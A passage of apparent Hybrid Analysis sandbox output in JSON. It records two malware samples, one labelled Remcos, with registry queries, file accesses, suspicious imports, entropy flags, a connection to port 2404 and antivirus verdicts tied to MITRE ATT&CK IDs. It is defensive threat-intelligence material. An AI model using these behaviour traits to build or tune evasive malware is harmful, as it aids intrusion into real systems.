\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\version.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe.Local\\\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe.Local\\\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\1EF1DA97A3FAE7E228E8B74AEA5B37AD948BCAD3054E24B4125782ECB3C82CE8.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005260)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005260)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-193", "relevance": 5, "name": "Calls an API used to change the configuration parameters of a service", "description": "Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has resource with unusual entropy \"RT_RCDATA:7.833302170533792\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has a section named \".gfids\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has a section named \"rqmsa\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"SleepConditionVariableCS\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNEL32.DLL)\n Found string \"FlsAlloc\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"InitOnceExecuteOnce\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNEL32.DLL)\n Found string \"CreateEventExW\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSemaphoreW\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNEL32.DLL)\n Found string \"CreateSemaphoreExW\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolTimer\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolWait\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSymbolicLinkW\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNEL32.DLL)\n Found string \"GetTickCount64\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"GetFileInformationByHandleEx\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNEL32.DLL)\n Found string \"SetFileInformationByHandle\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"SleepConditionVariableSRW\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNEL32.DLL)\n Found string \"CreateThreadpoolWork\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"GetLocaleInfoEx\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNELBASE.DLL)\n Found string \"GetDateFormatEx\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNEL32.DLL)\n Found string \"GetTimeFormatEx\" (Source: 1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8, API is part of module: KERNEL32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has section name .text with entropy \"6.6273936921798455\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has section name .reloc with entropy \"6.723768218094163\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" connects to <IPv4> on port 2404 (TCP)", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 2404", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
53567cc7f7c6d7d1538b06ce9bc2d61b262c5fe0b491afcbb68b042e4ecb1128
https://hybrid-analysis.com/sample/53567cc7f7c6d7d1538b06ce9bc2d61b262c5fe0b491afcbb68b042e4ecb1128
Hybrid Analysis - Remcos
{"size": 15140, "type": "HTML document, ASCII text, with very long lines (14972), with CRLF line terminators", "submit_name": "53567cc7f7c6d7d1538b06ce9bc2d61b262c5fe0b491afcbb68b042e4ecb1128", "sha256": "53567cc7f7c6d7d1538b06ce9bc2d61b262c5fe0b491afcbb68b042e4ecb1128", "av_detect": 39, "vx_family": "VBS.Asthma.2.4CC6382F", "threat_score": 80, "threat_level": 2, "verdict": "malicious", "total_network_connections": 1, "total_processes": 6, "total_signatures": 91, "extracted_files": [{"name": "ModuleAnalysisCache", "file_path": "%LOCALAPPDATA%\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", "file_size": 15183, "sha256": "a4f25ba127d1e1607df4027f2e99bfef3d4e176f393179fd07c07cfecf71871c", "type_tags": ["data"], "description": "data", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "StartupProfileData-NonInteractive", "file_path": "%LOCALAPPDATA%\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive", "file_size": 64, "sha256": "a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf", "type_tags": ["data"], "description": "data", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "3130B1871A126520A8C47861EFE3ED4D", "file_path": "%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D", "file_size": 521, "sha256": "1d9ee082745c4577a90f191c9f4e2aede0bdb6212254852bbbb56ebbd62ef81b", "type_tags": ["data"], "description": "data", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "57C8EDB95DF3F0AD4EE2DC2B8CFD4157", "file_path": "%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", "file_size": 4795, "sha256": "bf5e0eaa3ebd5e5e842756ad53e86960701da5b11c978687f643c317430bbe63", "type_tags": ["data"], "description": "Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A \"disallowedcert.stl\", number 1, 1 datablock, 0x1 compression", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "3130B1871A126520A8C47861EFE3ED4D", "file_path": "%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D", "file_size": 220, "sha256": "2a016f94d55e7635ba3a5c611c71aaa2989b8f095a667935ceafdeac35b91091", "type_tags": ["data"], "description": "data", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "57C8EDB95DF3F0AD4EE2DC2B8CFD4157", "file_path": "%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", "file_size": 340, "sha256": "3c144c7aa0384559b26982cca0ff5a4a504c62d19c8d7d007841406fdeb8cdf3", "type_tags": ["data"], "description": "data", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bbotlxd5.0.cs", "file_path": "%TEMP%\\bbotlxd5\\bbotlxd5.0.cs", "file_size": 465, "sha256": "59fb5ee2f23beec8c2623d2686a7b52d2eaf786f90869990d525facc2a2da7fa", "type_tags": ["text"], "description": "C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (354)", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bbotlxd5.cmdline", "file_path": "%TEMP%\\bbotlxd5\\bbotlxd5.cmdline", "file_size": 373, "sha256": "7008e2e2e3beaed8887bd71654ee703c64980461a20644bba9675c364f26ddbb", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (370), with no line terminators", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bbotlxd5.dll", "file_path": "%TEMP%\\bbotlxd5\\bbotlxd5.dll", "file_size": 3072, "sha256": "44b13bbbac73348353cf4000df01d32a581b9aab5137f3e6f205a09bd15ac711", "type_tags": ["pedll", "executable"], "description": "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bbotlxd5.out", "file_path": "%TEMP%\\bbotlxd5\\bbotlxd5.out", "file_size": 873, "sha256": "3a7c9c3cbf54ee2e718b8c192ffa6219164589d2c571782c89c70858917a85f0", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (452), with CRLF, CR line terminators", "runtime_process": "powershell.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "en-US.4", "file_size": 18176, "sha256": "c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad", "type_tags": ["data"], "description": "data", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "~DFA5621E6042CFFF11.TMP", "file_size": 16384, "sha256": "1929c48eada64e41a253c3704a04c3cc12be05a67bc76c401b659aae615fd482", "type_tags": ["data"], "description": "data", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "~DF0FDB9CBDB3CFFFED.TMP", "file_size": 16384, "sha256": "e419ecc2f7e6b7fa8b2ab2c07f57de9dd7e0feb6c10299ab6df73d54e16ef018", "type_tags": ["data"], "description": "data", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "RecoveryStore._C0E1682E-E783-11EF-A0B1-005056918B5E_.dat", "file_size": 5632, "sha256": "57d943d26caf88560248bf068a04c31a1a346ad51d4c850d6a9e4040c40fdfbf", "type_tags": ["text"], "description": "Composite Document File V2 Document, Cannot read section info", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_C0E16830-E783-11EF-A0B1-005056918B5E_.dat", "file_size": 4608, "sha256": "cb1ceae71d403f35a12eb40548ec8d86e34d9fe369257b39dfc6b4a0f910f66e", "type_tags": ["text"], "description": "Composite Document File V2 Document, Cannot read section info", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "RES9B07.tmp", "file_size": 1336, "sha256": "1d48777cafeee5382697db44469368ef31e1879bd1f097dfc69849f8e38599e9", "type_tags": ["unknown"], "description": 